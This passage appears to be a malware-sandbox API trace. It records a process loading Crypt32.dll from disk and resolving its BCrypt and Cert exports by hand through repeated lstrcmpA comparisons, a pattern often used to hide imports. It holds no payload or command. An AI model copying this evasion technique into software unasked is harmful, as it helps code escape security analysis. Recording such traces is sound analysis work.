(lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0090.650] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0090.651] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0090.652] GetProcessHeap () returned 0x440000 [0090.652] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c72010 | out: hHeap=0x440000) returned 1 [0090.652] GetProcessHeap () returned 0x440000 [0090.652] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459060 [0090.653] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0090.660] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0090.660] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0090.660] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0090.660] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0090.660] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0090.660] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0090.660] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0090.660] GetProcessHeap () returned 0x440000 [0090.660] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1c30e0) returned 0x403c040 [0090.666] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0090.666] ReadFile (in: hFile=0x160, lpBuffer=0x403c040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x403c040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0091.029] CloseHandle (hObject=0x160) returned 1 [0091.057] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0091.058] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0091.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0091.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0091.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0091.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0091.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0091.058] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.058] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0091.059] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0091.061] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0091.061] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0091.062] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.063] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.063] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0091.063] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.064] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.065] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.065] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.065] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.065] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0091.066] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0091.066] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0091.066] 